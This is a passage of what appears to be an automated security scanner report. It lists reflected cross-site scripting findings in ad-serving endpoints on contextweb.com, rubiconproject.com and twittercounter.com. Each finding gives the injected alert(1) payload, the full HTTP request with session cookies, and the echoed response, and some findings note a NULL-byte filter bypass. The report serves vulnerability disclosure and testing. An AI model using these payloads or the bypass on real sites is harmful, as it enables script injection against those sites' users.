       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104419";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="2504ed52";alert(1)//c2946f30f57";var cads="0";var cp="537740";var ct="104419";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase())
...[SNIP]...

4.139. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d378e"%3balert(1)//df6aacf80d4 was submitted in the cwpid parameter. This input was echoed as d378e";alert(1)//df6aacf80d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=537740d378e"%3balert(1)//df6aacf80d4&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=104419 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=37M4UCmiRyB6IR1gZ3cdPsPp7dqu0qA-iSvPwwcSCtovToPw-VwALGg; CDSActionTracking6=sR5ROZTWi6dz|66SC8LGNnu59|537740|1998|6721|58320|126995|104420|4|363|27|nydailynews.com|2|8|1|0|2|1|2||1|1|nbV19OwIzkYI9sHccDdTOyNKH2k1Vvuj9xK3Cw1Zw-4^|I|3pG7f|3AypH; FC1-WC=^58320_1_3q2AN^58209_1_3q2Hu; V=66SC8LGNnu59; pb_rtb_ev=1:534301.842023e7-29db-4d1c-bd4b-6805881809de.0|534889.v3y4gkoh99wrv.0|530741.7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0.0|535461.3041410246858069995.0|536088.211111708350353.0|531399.1sbvs30c072oq.0|530739.4e394114-5150-5bce-73fa-628197421391.0|535495.12128760-c15f-11e0-bd76-00259009a9e4.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP211
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Thu, 11 Aug 2011 22:35:27 GMT
Content-Length: 8886
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:22:07 GMT; Path=/

function cw_Process() {
try {
var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740d378e";alert(1)//df6aacf80d4";var cwtagid="104419";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="537740d378e";alert(1)//df6aacf80d4";var ct="104419";var cf="300X250";var cn="
...[SNIP]...

4.140. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad4ea"%3balert(1)//fa30dd9d4f8 was submitted in the cwpid parameter. This input was echoed as ad4ea";alert(1)//fa30dd9d4f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=160X600&cwpid=537740ad4ea"%3balert(1)//fa30dd9d4f8&cwwidth=160&cwheight=600&cwpnet=1&cwtagid=104418 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/160x600/sports_atf?t=1313102520280&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fsports%2Fbaseball%2Fyankees%2F2011%2F08%2F11%2F2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Fsports%2Findex.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=37M4UCmiRyB6IR1gZ3cdPsPp7dqu0qA-iSvPwwcSCtovToPw-VwALGg; CDSActionTracking6=e8u7UCx2LPDS|66SC8LGNnu59|537740|1998|6721|58320|126994|104419|3|16|16|nydailynews.com|2|8|1|0|2|1|2||1|1|nbV19OwIzkYI9sHccDdTOyNKH2k1Vvuj9xK3Cw1Zw-4^|I|3r5ab|3BXsD; V=66SC8LGNnu59; pb_rtb_ev=1:537583.27acd458-36c8-4224-829c-3ed04dd4cb13.0|534889.v3y4gkoh99wrv.0|534301.842023e7-29db-4d1c-bd4b-6805881809de.0|535461.3041410246858069995.0|530741.7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0.0|531292.CM-00000001429329761.0|531399.1sbvs30c072oq.0|536088.211111708350353.0|530739.4e394114-5150-5bce-73fa-628197421391.0|535039.8413bde9-2099-43af-b214-8fee85ef2861.0|535495.12128760-c15f-11e0-bd76-00259009a9e4.0|538303.x.0; 537740_4_104420_-1=1313102325339; cw=cw; FC1-WC=^58320_1_3rrDJ^54779_1_3rrJu; vf=5

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 8886
Date: Thu, 11 Aug 2011 22:44:37 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:31:17 GMT; Path=/

function cw_Process() {
try {
var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740ad4ea";alert(1)//fa30dd9d4f8";var cwtagid="104418";var cwadformat="160X600";var ca="VIEWAD";var cr="200";var cw="160";var ch="600";var cads="0";var cp="537740ad4ea";alert(1)//fa30dd9d4f8";var ct="104418";var cf="160X600";var cn="
...[SNIP]...

4.141. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fca4"%3balert(1)//992f4f13eb1 was submitted in the cwpnet parameter. This input was echoed as 4fca4";alert(1)//992f4f13eb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=537740&cwwidth=300&cwheight=250&cwpnet=14fca4"%3balert(1)//992f4f13eb1&cwtagid=104419 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102358556&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=37M4UCmiRyB6IR1gZ3cdPsPp7dqu0qA-iSvPwwcSCtovToPw-VwALGg; cw=cw; FC1-WC=^58320_1_3rrDJ; CDSActionTracking6=e8u7UCx2LPDS|66SC8LGNnu59|537740|1998|6721|58320|126994|104419|3|16|16|nydailynews.com|2|8|1|0|2|1|2||1|1|nbV19OwIzkYI9sHccDdTOyNKH2k1Vvuj9xK3Cw1Zw-4^|I|3r5ab|3BXsD; vf=1; V=66SC8LGNnu59; pb_rtb_ev=1:537583.27acd458-36c8-4224-829c-3ed04dd4cb13.0|534889.v3y4gkoh99wrv.0|534301.842023e7-29db-4d1c-bd4b-6805881809de.0|535461.3041410246858069995.0|530741.7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0.0|531292.CM-00000001429329761.0|531399.1sbvs30c072oq.0|536088.211111708350353.0|530739.4e394114-5150-5bce-73fa-628197421391.0|535039.8413bde9-2099-43af-b214-8fee85ef2861.0|535495.12128760-c15f-11e0-bd76-00259009a9e4.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Thu, 11 Aug 2011 22:40:20 GMT
Content-Length: 8858
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:27:00 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104419";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="537740";var ct="104419";var cf="300X250";var cn="14fca4";alert(1)//992f4f13eb1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) != -1);
       };
       var _nxy = [-1,-1];
       var _cwd = document;
       var _cww = wi
...[SNIP]...

4.142. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c202"%3balert(1)//af67a534b0a was submitted in the cwpnet parameter. This input was echoed as 7c202";alert(1)//af67a534b0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=537740&cwwidth=300&cwheight=250&cwpnet=17c202"%3balert(1)//af67a534b0a&cwtagid=104419 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=37M4UCmiRyB6IR1gZ3cdPsPp7dqu0qA-iSvPwwcSCtovToPw-VwALGg; CDSActionTracking6=sR5ROZTWi6dz|66SC8LGNnu59|537740|1998|6721|58320|126995|104420|4|363|27|nydailynews.com|2|8|1|0|2|1|2||1|1|nbV19OwIzkYI9sHccDdTOyNKH2k1Vvuj9xK3Cw1Zw-4^|I|3pG7f|3AypH; FC1-WC=^58320_1_3q2AN^58209_1_3q2Hu; V=66SC8LGNnu59; pb_rtb_ev=1:534301.842023e7-29db-4d1c-bd4b-6805881809de.0|534889.v3y4gkoh99wrv.0|530741.7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0.0|535461.3041410246858069995.0|536088.211111708350353.0|531399.1sbvs30c072oq.0|530739.4e394114-5150-5bce-73fa-628197421391.0|535495.12128760-c15f-11e0-bd76-00259009a9e4.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Thu, 11 Aug 2011 22:35:35 GMT
Content-Length: 8858
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:22:15 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104419";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="537740";var ct="104419";var cf="300X250";var cn="17c202";alert(1)//af67a534b0a";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) != -1);
       };
       var _nxy = [-1,-1];
       var _cwd = document;
       var _cww = wi
...[SNIP]...

4.143. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2af4"%3balert(1)//dac2104abbd was submitted in the cwrun parameter. This input was echoed as e2af4";alert(1)//dac2104abbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200e2af4"%3balert(1)//dac2104abbd&cwadformat=300X250&cwpid=537740&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=104419 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=37M4UCmiRyB6IR1gZ3cdPsPp7dqu0qA-iSvPwwcSCtovToPw-VwALGg; CDSActionTracking6=sR5ROZTWi6dz|66SC8LGNnu59|537740|1998|6721|58320|126995|104420|4|363|27|nydailynews.com|2|8|1|0|2|1|2||1|1|nbV19OwIzkYI9sHccDdTOyNKH2k1Vvuj9xK3Cw1Zw-4^|I|3pG7f|3AypH; FC1-WC=^58320_1_3q2AN^58209_1_3q2Hu; V=66SC8LGNnu59; pb_rtb_ev=1:534301.842023e7-29db-4d1c-bd4b-6805881809de.0|534889.v3y4gkoh99wrv.0|530741.7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0.0|535461.3041410246858069995.0|536088.211111708350353.0|531399.1sbvs30c072oq.0|530739.4e394114-5150-5bce-73fa-628197421391.0|535495.12128760-c15f-11e0-bd76-00259009a9e4.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP214
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 8858
Date: Thu, 11 Aug 2011 22:35:22 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:22:02 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104419";var cwadformat="300X250";var ca="VIEWAD";var cr="200e2af4";alert(1)//dac2104abbd";var cw="300";var ch="250";var cads="0";var cp="537740";var ct="104419";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase()
...[SNIP]...

4.144. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeeb4"%3balert(1)//eb5a95ddb96 was submitted in the cwrun parameter. This input was echoed as aeeb4";alert(1)//eb5a95ddb96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200aeeb4"%3balert(1)//eb5a95ddb96&cwadformat=160X600&cwpid=525830&cwwidth=160&cwheight=600&cwpnet=1&cwtagid=78565 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/257/campusfood/160x600/campusfood_atf?t=1313103300374&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcdn2.allmenus.com.s3.amazonaws.com%2Fv50%2Fcommon%2Fstatic%2Fadvertisements.html%3Fserver%3Dwww.allmenus.com%26slot%3Dam_50_location_skyscraper&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: V=ZZVrXBMk1mFi; cwbh1=749%3B08%2F22%2F2011%3BDOTM6%0A996%3B09%2F04%2F2011%3BFACO1; pb_rtb_ev=1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0; C2W4=3ncqaSewwHBKMpwXEV2xPrPwuGXdzMM__jVZBsuS4rDtkvyKd_yspGw

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP211
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 8856
Date: Thu, 11 Aug 2011 22:54:24 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:41:04 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="525830";var cwtagid="78565";var cwadformat="160X600";var ca="VIEWAD";var cr="200aeeb4";alert(1)//eb5a95ddb96";var cw="160";var ch="600";var cads="0";var cp="525830";var ct="78565";var cf="160X600";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().
...[SNIP]...

4.145. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35f78"%3balert(1)//f5b2b62dfde was submitted in the cwtagid parameter. This input was echoed as 35f78";alert(1)//f5b2b62dfde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=537740&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=35f78"%3balert(1)//f5b2b62dfde HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=37M4UCmiRyB6IR1gZ3cdPsPp7dqu0qA-iSvPwwcSCtovToPw-VwALGg; CDSActionTracking6=sR5ROZTWi6dz|66SC8LGNnu59|537740|1998|6721|58320|126995|104420|4|363|27|nydailynews.com|2|8|1|0|2|1|2||1|1|nbV19OwIzkYI9sHccDdTOyNKH2k1Vvuj9xK3Cw1Zw-4^|I|3pG7f|3AypH; FC1-WC=^58320_1_3q2AN^58209_1_3q2Hu; V=66SC8LGNnu59; pb_rtb_ev=1:534301.842023e7-29db-4d1c-bd4b-6805881809de.0|534889.v3y4gkoh99wrv.0|530741.7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0.0|535461.3041410246858069995.0|536088.211111708350353.0|531399.1sbvs30c072oq.0|530739.4e394114-5150-5bce-73fa-628197421391.0|535495.12128760-c15f-11e0-bd76-00259009a9e4.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP206
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Thu, 11 Aug 2011 22:35:37 GMT
Content-Length: 8874
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:22:17 GMT; Path=/

function cw_Process() {
try {
var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="35f78";alert(1)//f5b2b62dfde";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="537740";var ct="35f78";alert(1)//f5b2b62dfde";var cf="300X250";var cn="1";var epid="";var esid="";
...[SNIP]...

4.146. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6e08"%3balert(1)//68a4bfa8a5 was submitted in the cwwidth parameter. This input was echoed as e6e08";alert(1)//68a4bfa8a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=537740&cwwidth=300e6e08"%3balert(1)//68a4bfa8a5&cwheight=250&cwpnet=1&cwtagid=104419 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=37M4UCmiRyB6IR1gZ3cdPsPp7dqu0qA-iSvPwwcSCtovToPw-VwALGg; CDSActionTracking6=sR5ROZTWi6dz|66SC8LGNnu59|537740|1998|6721|58320|126995|104420|4|363|27|nydailynews.com|2|8|1|0|2|1|2||1|1|nbV19OwIzkYI9sHccDdTOyNKH2k1Vvuj9xK3Cw1Zw-4^|I|3pG7f|3AypH; FC1-WC=^58320_1_3q2AN^58209_1_3q2Hu; V=66SC8LGNnu59; pb_rtb_ev=1:534301.842023e7-29db-4d1c-bd4b-6805881809de.0|534889.v3y4gkoh99wrv.0|530741.7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0.0|535461.3041410246858069995.0|536088.211111708350353.0|531399.1sbvs30c072oq.0|530739.4e394114-5150-5bce-73fa-628197421391.0|535495.12128760-c15f-11e0-bd76-00259009a9e4.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 8857
Date: Thu, 11 Aug 2011 22:35:29 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:22:09 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104419";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300e6e08";alert(1)//68a4bfa8a5";var ch="250";var cads="0";var cp="537740";var ct="104419";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.to
...[SNIP]...

4.147. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/partner/agent/rubicon/channels.js

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e651a%3balert(1)//6fde11e7d2 was submitted in the cb parameter. This input was echoed as e651a;alert(1)//6fde11e7d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoadede651a%3balert(1)//6fde11e7d2&pc=5804/7477 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://restaurants.nydailynews.com/custom-results/online-ordering/968994-manhattan-ny-10010/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=epx833ob7ioshhooj9oxwp9jj6h1a7p1; put_1430=7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; put_1994=1sbvs30c072oq; rpb=7249%3D1%264554%3D1%264940%3D1%264212%3D1; put_1185=3041410246858069995

Response

HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 22:46:48 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 562
Cache-control: private
Set-Cookie: khaos=GR8BI78X-D-IITM; Domain=.rubiconproject.com; Expires=Fri, 09-Aug-2019 22:46:48 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close

var oo_profile={
tokenType : "0",
tracking : "",
tags : "",
tagcloud : [
],
pixels : [
{ url: "http://pixel.rubiconproject.com/di.php?v=2372||2373|0||2374|0||&r=3761|0,3169,3578,
...[SNIP]...
2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375,"}
]
};

try {
oz_onPixelsLoadede651a;alert(1)//6fde11e7d2(oo_profile);
} catch(ignore) {}

4.148. http://twittercounter.com/embed/ [style parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://twittercounter.com
Path:	/embed/

Issue detail

The value of the style request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a419'%3balert(1)//503c7e8495b was submitted in the style parameter. This input was echoed as 3a419';alert(1)//503c7e8495b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/?username=ChromeBrowser&style=bird3a419'%3balert(1)//503c7e8495b HTTP/1.1
Host: twittercounter.com
Proxy-Connection: keep-alive
Referer: http://google-chrome-browser.com/tags/extensions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
